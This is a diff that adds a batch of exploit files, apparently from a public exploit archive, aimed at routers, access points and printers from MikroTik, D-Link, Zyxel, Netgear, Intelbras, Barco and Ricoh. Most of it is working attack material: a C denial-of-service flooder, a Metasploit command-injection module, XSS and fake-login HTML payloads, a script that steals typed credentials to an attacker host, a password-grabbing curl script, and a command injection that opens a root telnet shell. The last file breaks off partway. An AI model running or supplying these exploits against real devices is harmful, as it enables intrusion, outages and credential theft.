diff --git a/exploits/hardware/remote/48228.txt b/exploits/hardware/remote/48228.txt
new file mode 100644
index 000000000..da3ac0fe1
--- /dev/null
+++ b/exploits/hardware/remote/48228.txt
@@ -0,0 +1,103 @@
+# Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
+# Author: Hosein Askari
+# Date: 2020-03-18
+# Vendor Homepage: https://mikrotik.com/
+# Model: hAP lite
+# Processor architecture: smips
+# Affected Version: through 6.44.3
+# CVE: N/A
+
+#Description:
+An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
+#details:
+The issue reported in 02/25/2020 to the Mikrotik
+First response by Mikrotik in 02/26/2020
+The additional information about exploit and PoC video sent in 02/26/2020
+The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
+#PoC:
+#Mitigation:
+It can be mitigated with firewall filter and service port restrictions.
+Solution:
+Hardening and tuning the daemon for these 2 parameters:
+1- Number of allowed unauthenticated connections to ssh daemon
+2- Maximum number of connections at which we start dropping everything for ssh daemon
+PoC:
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <netdb.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#define MAX_CON 32
+#define MAX_THREADS 16
+
+int Socket(char *ip, char *port) {
+    struct addrinfo hints, *ret, *p;
+    int sock, r; 
+    ssize_t bytes;
+    char buffer[2048];
+    memset(&hints, 0, sizeof(hints));
+    hints.ai_family = AF_UNSPEC;
+    hints.ai_socktype = SOCK_STREAM;
+    if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
+        return EXIT_FAILURE;
+       }
+    for(p = ret; p != NULL; p = p->ai_next) {
+        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
+            continue;
+        }
+        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
+            close(sock);
+            continue;
+        }
+        break;
+    }
+    if(ret)
+        freeaddrinfo(ret);
+    fprintf(stderr, "ESTABLISHED  %s:%s\n", ip, port);
+    return sock;
+}
+
+void signal_callback_handler(int signum){
+        printf("Caught signal SIGPIPE %d\n",signum);
+}
+
+void mal(char *ip, char *port, int id) {
+    int sockets[MAX_CON];
+    int i, g=1, r;
+    for(i=0; i!= MAX_CON; i++)
+        sockets[i]=0;
+    signal(SIGPIPE, signal_callback_handler);
+    while(1) {
+        for(i=0; i!= MAX_CON; i++) {
+            if(sockets[i] == 0)
+                sockets[i] = Socket(ip, port);
+            r=write(sockets[i], "\0", 1);
+            if(r == -1) {
+                close(sockets[i]);
+                sockets[i] = Socket(ip, port);
+            }
+        }
+        usleep(200000);
+    }
+}
+
+int main(int argc, char **argv) {
+    int i;
+    for(i=0; i!= MAX_THREADS; i++) {
+        if(fork())
+            mal(argv[1], argv[2], i);
+        usleep(200000);
+    }
+    getc(stdin);
+    return 0;
+}
+#########
+
+Sincerely,
+Hosein Askari
\ No newline at end of file
diff --git a/exploits/hardware/remote/48274.rb b/exploits/hardware/remote/48274.rb
new file mode 100755
index 000000000..baf050e05
--- /dev/null
+++ b/exploits/hardware/remote/48274.rb
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'DLINK DWL-2600 Authenticated Remote Command Injection',
+      'Description' => %q{
+          Some DLINK Access Points are vulnerable to an authenticated OS command injection.
+          Default credentials for the web interface are admin/admin.
+      },
+      'Author'      =>
+        [
+          'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
+          'Nick Starke' # Metasploit Module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2019-20499' ],
+          [ 'EDB', '46841' ]
+        ],
+      'DisclosureDate' => 'May 15 2019',
+      'Privileged'     => true,
+      'Platform'       => %w{ linux unix },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars' => "\x00"
+        },
+      'CmdStagerFlavor' => :wget,
+      'Targets'        =>
+        [
+          [ 'CMD',
+            {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+            }
+          ],
+          [ 'Linux mips Payload',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 1
+      ))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
+        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
+        OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
+      ])
+  end
+
+  def execute_command(cmd, opts={})
+    bogus = Rex::Text.rand_text_alpha(rand(10))
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
+    post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
+    post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
+
+    print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'admin.cgi'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => "sessionHTTP=#{@token};",
+      'data'   => post_data.to_s,
+      'query'  => 'action=config_restore'
+    })
+
+    unless res || res.code != 200
+      fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
+    end
+
+  rescue ::Rex::ConnectionError
+    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    return
+  end
+
+  def exploit
+    user = datastore['HttpUsername']
+    pass = datastore['HttpPassword']
+    rhost = datastore['RHOST']
+    rport = datastore['RPORT']
+
+    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, '/admin.cgi'),
+      'method' => 'POST',
+      'vars_post'   => {
+        'i_username' => user,
+        'i_password' => pass,
+        'login'      => 'Logon'
+      }
+    })
+
+    unless res && res.code != 404
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+    end
+
+    unless [200, 301, 302].include?(res.code)
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+    end
+
+    print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+
+    delstart = 'var cookieValue = "'
+    tokenoffset = res.body.index(delstart) + delstart.size
+    endoffset = res.body.index('";', tokenoffset)
+    @token = res.body[tokenoffset, endoffset - tokenoffset]
+
+    if @token.empty?
+      fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
+    end
+
+    print_good("#{peer} - Received Auth token: #{@token}")
+    if target.name =~ /CMD/
+      unless datastore['CMD']
+        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
+      end
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(linemax: 100, noconcat: true)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46240.html b/exploits/hardware/webapps/46240.html
index 39de03d31..c33e8aecf 100644
--- a/exploits/hardware/webapps/46240.html
+++ b/exploits/hardware/webapps/46240.html
@@ -4,7 +4,7 @@
 # Tested on: Windows 10 x64
 # CVE : CVE-2019-6710
 # Author : Ali Can Gönüllü
-# Twitter : @god3err
+# Twitter : @alicangonullu
 
 Exploits :
 -->
diff --git a/exploits/hardware/webapps/46667.txt b/exploits/hardware/webapps/46667.txt
new file mode 100644
index 000000000..680257f1c
--- /dev/null
+++ b/exploits/hardware/webapps/46667.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Reflected HTML Injection
+# Google Dork: None
+# Date: 16/12/2015
+# Exploit Author: Ramikan
+# Vendor Homepage:https://www.salicru.com/en/
+# Software Link: N/A
+# Version: Tested on SaLICru -SLC-20-cube3(5).
+# Firmware: cs121-SNMP v4.54.82.130611
+# CVE : CVE-2019-10887
+# Category:Web Apps
+
+
+Vulnerability: Reflected HTML Injection
+Vendor Web site: 
+Version tested:cs121-SNMP v4.54.82.130611 
+Solution: N/A
+Note:Default credential:admin/admin or admin/cs121-snmp
+Victim need to be authenticated in order to get affected by this.
+
+
+Vulnerability 1:Refelected HTML Injection
+
+Affected URL:
+
+/DataLog.csv?log=
+/AlarmLog.csv?log=
+/waitlog.cgi?name=
+/chart.shtml?data=
+/createlog.cgi?name=
+
+Affected Parameter: log, name, data
+
+Payload: <h1>HTML Injection</h1>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46687.txt b/exploits/hardware/webapps/46687.txt
new file mode 100644
index 000000000..a766f5d3f
--- /dev/null
+++ b/exploits/hardware/webapps/46687.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Multiple Stored and Reflected XSS vulnerabilities in D-Link DI-524
+# Date: April 6, 2019
+# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
+# Vendor Homepage: https://www.dlink.com
+# Version: D-Link DI-524 - V2.06RU
+# CVE : CVE-2019-11017 
+
+To re-create Reflected XSS vulnerability, log in to the Web Configuration (default credentials are: "admin":"" without double quotes), and send GET request to the router with malformed vulnerable parameter:
+
+http://$IP/cgi-bin/smap?RC=@smap%22-$PAYLOAD-%22&rd=x&SEO=o&AC=O&SnO=1&SHO=2&StO=1&SpO=1&SPO=1
+
+Where $IP may be equal to "192.168.0.1", $PAYLOAD may be equal to "alert(document.location)".
+
+Stored XSS's were found in web forms on pages /spap.htm, /smap.htm. To inject malicious JavaScript to victim's webpage, an attacker should authorize on the router, then put a payload to any of the vulnerable forms, and wait, until victim opens router's web interface and goes to vulnerable page.
+
+I haven't tested all the admin panel of the router, so I can guess that there are other XSS vulnerabilities in this router.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46706.txt b/exploits/hardware/webapps/46706.txt
new file mode 100644
index 000000000..2a4d1b0f5
--- /dev/null
+++ b/exploits/hardware/webapps/46706.txt
@@ -0,0 +1,80 @@
+# Exploit Title: Reflected XSS on Zyxel login pages
+# Date: 10 Apr 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://www.zyxel.com/us/en/
+# Version: V4.31
+# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
+# CVE : 2019-9955
+
+1. Description
+==============
+
+Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
+mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.
+
+2. Proof of Concept
+=============
+
+Host a malicious file JavaScript file named 'z', or any other single character,
+locally.  The contents of 'z' for the following example are:
+
+
+-----
+$("button").click(function() {
+    $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
+});
+-----
+
+
+Close the mp_idx variable with "; and Use the getScript functionality of jQuery
+to include the malicious file: 
+
+Request:
+
+GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
+Host: $RHOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Wed, 10 Apr 2019 23:13:39 GMT
+Cache-Control: no-cache, private
+Pragma: no-cache
+Expires: Mon, 16 Apr 1973 13:10:00 GMT
+Connection: close
+Content-Type: text/html
+Content-Length: 7957
+
+<!DOCTYPE html>
+<html>
+<head>
+	<title>Welcome</title>
+	<meta name="viewport" content="width=device-width, initial-scale=1">
+	<meta charset="utf-8">
+	<meta http-equiv="pragma" content="no-cache">
+    <link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
+    <link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
+    <link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
+	<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" /> 
+	<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
+    <script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
+	<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
+<script language="JavaScript">
+	var errorNum = 0;
+	var mp_idx = "";$.getScript('//$LHOST/z');//";
+...
+
+
+When the login form is submitted, the host for the malicious file gets a request
+containing the login credentials and target system:
+
+$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
+$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46751.txt b/exploits/hardware/webapps/46751.txt
new file mode 100644
index 000000000..4c9b7e073
--- /dev/null
+++ b/exploits/hardware/webapps/46751.txt
@@ -0,0 +1,63 @@
+# Exploit Title: cgi-bin/qcmap_web_cgi on  JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST  parameter.
+# Exploit Author:  Vikas Chaudhary
+# Date: 21-01-2019
+# Vendor Homepage: https://www.jio.com/
+# Hardware Link:  https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
+# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
+# Category: Hardware
+# Contact: https://www.facebook.com/profile.php?id=100011287630308
+# Web:  https://gkaim.com/
+# Tested on: Windows 10 X64- Firefox-65.0
+# CVE-2019-7438
+***********************************************************************
+## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. 
+----------------------------------------
+# Proof Of ConceptoC
+1- First Open BurpSuite
+2- Make Intercept on 
+3 -Go to your Wifi Router's  Gateway in Browser  [i.e http://192.168.225.1 ]
+4-Capture the data and then Spider the Host
+5- Now You find a Link like like this  [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
+6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
+7-Vulnerable parameter is => mash 
+8-Paste this PAYLOAD in mask parameter and then show Response in browser 
+Payload => 
+
+<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
+
+9- You will see a fake Login page on the screen -
+----------------------------------------------------------------------------------
+Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter -
+----------------------------------------------------------------------------------
+REQUEST 
+-------------------
+POST /cgi-bin/qcmap_web_cgi HTTP/1.1
+Host: 192.168.225.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.225.1/
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 550
+Connection: close
+
+Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0
+
+****************************
+RESPONSE
+-----------------
+
+HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+X-Frame-Options: SAMEORIGIN
+connection: close
+Content-Type: text/html
+Content-Length: 1167
+Date: Mon, 21 Jan 2019 18:02:07 GMT
+Server: lighttpd/1.4.35
+
+{"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"}
+
+---------------------------------------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46764.sh b/exploits/hardware/webapps/46764.sh
new file mode 100755
index 000000000..dc4784eea
--- /dev/null
+++ b/exploits/hardware/webapps/46764.sh
@@ -0,0 +1,29 @@
+#/bin/bash
+
+#   PoC based on CVE-2016-5649 created by Social Engineering Neo.
+#
+#   Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs
+#
+#   https://www.shodan.io/search?query=DGN2200  = 2,325 possible vulnerable devices.
+#   https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices.
+#
+#   A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication.
+#   When the request is processed, it exposes the administrator password in clear text before getting redirected to 'absw_vfysucc.cgia'.
+#   An attacker can use this password to gain administrator access of the targeted routers web interface.
+#
+#   Netgear has released firmware version 1.0.0.52 for DGN2200 & 1.0.0.28 for DGND3700 to address this issue.
+
+clear
+read -p "Enter Target Address Followed by Port: " target port   # localhost 8080
+
+if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
+    grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' $target:$port/BSW_cxttongr.htm)
+    pass=$(echo $grab | awk '{print $218}' | tail -c +2 | head -c -3)
+    if [ "$pass" == '' ] || [ "$pass" == '/html' ] ; then
+        echo Invalid Response, Target May Not be Vulnerable.
+    else
+        echo The Password for: $target is: $pass
+    fi
+else
+    echo "Incorrect Port."
+fi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46768.sh b/exploits/hardware/webapps/46768.sh
new file mode 100755
index 000000000..3fe3d3ff6
--- /dev/null
+++ b/exploits/hardware/webapps/46768.sh
@@ -0,0 +1,36 @@
+#/bin/bash
+
+#   PoC based on CVE-2019-11415 created by Social Engineering Neo.
+#
+#   Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
+#
+#   A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
+#
+#   Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
+
+clear
+read -p "Enter Target Address Followed by Port: " target port   # localhost 8080
+
+alive=$(ping -c 1 $target | grep icmp* | wc -l)
+if [ "$alive" -eq 0 ]; then
+    echo Target May be Offline or Blocking ICMP requests.
+    read -p "Would you Like to Proceed? (Y/n): " ans
+    if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
+        clear
+        exit
+    fi
+fi
+
+if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
+    grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
+else
+    echo "Incorrect Port."
+fi
+
+clear
+alive=$(ping -c 1 $target | grep icmp* | wc -l)
+if [ "$alive" -eq 0 ]; then
+    echo Router Successfully Taken Offline.     #NOTE: if router blocks ICMP requests this may be inaccurate.
+else
+    echo Exploit Unsuccessfull, Target May Not be Vulnerable.
+fi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46770.html b/exploits/hardware/webapps/46770.html
new file mode 100644
index 000000000..e636b84fd
--- /dev/null
+++ b/exploits/hardware/webapps/46770.html
@@ -0,0 +1,35 @@
+<!--
+    PoC based on CVE-2019-11416 created by Social Engineering Neo.
+
+    Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/
+
+    Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.
+
+    Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
+-->
+
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+            <meta charset="UTF-8">
+            <meta name="viewport" content="width=device-width, initial-scale=1.0">
+            <meta http-equiv="X-UA-Compatible" content="ie=edge">
+            <title>IWR 3000N - CSRF on authenticated administrator</title>
+    </head>
+    <body>
+        <button onclick="exploit()">Exploit!</button>
+        <p>Click the button to get the login and password.</p>
+        <script>
+            function exploit(){
+                $.get( "http://localhost:80/v1/system/user" )
+                .done(( data ) => {
+                    alert( data );
+                })
+                .fail(function( err, status) {
+                    alert( status );
+                });
+            }
+        </script>
+        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
+    </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46786.txt b/exploits/hardware/webapps/46786.txt
new file mode 100644
index 000000000..8d73a26c7
--- /dev/null
+++ b/exploits/hardware/webapps/46786.txt
@@ -0,0 +1,40 @@
+##
+# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection 
+# Date: 05/01/2019
+# Exploit Author: Jacob Baines
+# Tested on: Crestron AM-100 1.6.0.2
+# CVE : CVE-2019-3929
+# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
+# Advisory: https://www.tenable.com/security/research/tra-2019-20
+# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
+# Affected Vendors/Device/Firmware:
+#  - Crestron AM-100 1.6.0.2
+#  - Crestron AM-101 2.7.0.1
+#  - Barco wePresent WiPG-1000P 2.3.0.10
+#  - Barco wePresent WiPG-1600W before 2.4.1.19
+#  - Extron ShareLink 200/250 2.0.3.4
+#  - Teq AV IT WIPS710 1.1.0.7
+#  - InFocus LiteShow3 1.0.16
+#  - InFocus LiteShow4 2.0.0.7
+#  - Optoma WPS-Pro 1.0.0.5
+#  - Blackbox HD WPS 1.0.0.5
+#  - SHARP PN-L703WA 1.4.2.3
+##
+
+The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:
+
+curl --header "Content-Type: application/x-www-form-urlencoded" \
+--request POST \
+--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
+--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
+
+Example:
+
+albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
+root
+albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
+Trying 192.168.88.250...
+Connected to 192.168.88.250.
+Escape character is '^]'.
+
+~/boa/cgi-bin #
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46826.txt b/exploits/hardware/webapps/46826.txt
new file mode 100644
index 000000000..2d921c269
--- /dev/null
+++ b/exploits/hardware/webapps/46826.txt
@@ -0,0 +1,42 @@
+# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4510DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11845
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 102
+DNT: 1
+Connection: close
+Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
+
+mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:42:46 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:42:46 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46827.txt b/exploits/hardware/webapps/46827.txt
new file mode 100644
index 000000000..6b2972d90
--- /dev/null
+++ b/exploits/hardware/webapps/46827.txt
@@ -0,0 +1,43 @@
+# Exploit Title: RICOH SP 4520DN Printer - HTML Injection
+# Date: 2019-05-06 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
+# Software: RICOH Printer
+# Product Version: SP 4520DN
+# Vulernability Type: Code Injection
+# Vulenrability: HTML Injection
+# CVE: CVE-2019-11844
+
+# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
+# entryNameIn or entryDisplayNameIn parameter.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/plain, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 219
+DNT: 1
+Connection: close
+Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008
+
+mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
+
+# HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Mon, 06 May 2019 11:00:09 GMT
+Server: Web-Server/3.0
+Content-Type: text/plain
+Expires: Mon, 06 May 2019 11:00:09 GMT
+Set-Cookie: cookieOnOffChecker=on; path=/
+Connection: close
+
+[14]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46841.txt b/exploits/hardware/webapps/46841.txt
new file mode 100644
index 000000000..e445adf0d
--- /dev/null
+++ b/exploits/hardware/webapps/46841.txt
@@ -0,0 +1,356 @@
+Document Title:
+===============
+D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
+
+Product & Service Introduction:
+===============================
+The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
+
+Affected Product(s):
+====================
+Product: D-Link DWL-2600AP (Web Interface)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+HIGH
+
+CVE: CVE-2019-20499
+CVE: CVE-2019-20500
+CVE: CVE-2019-20501
+
+
+Base Score (CVSS):
+===============
+7.8
+
+===============
+Request Method(s):
+[+] POST
+
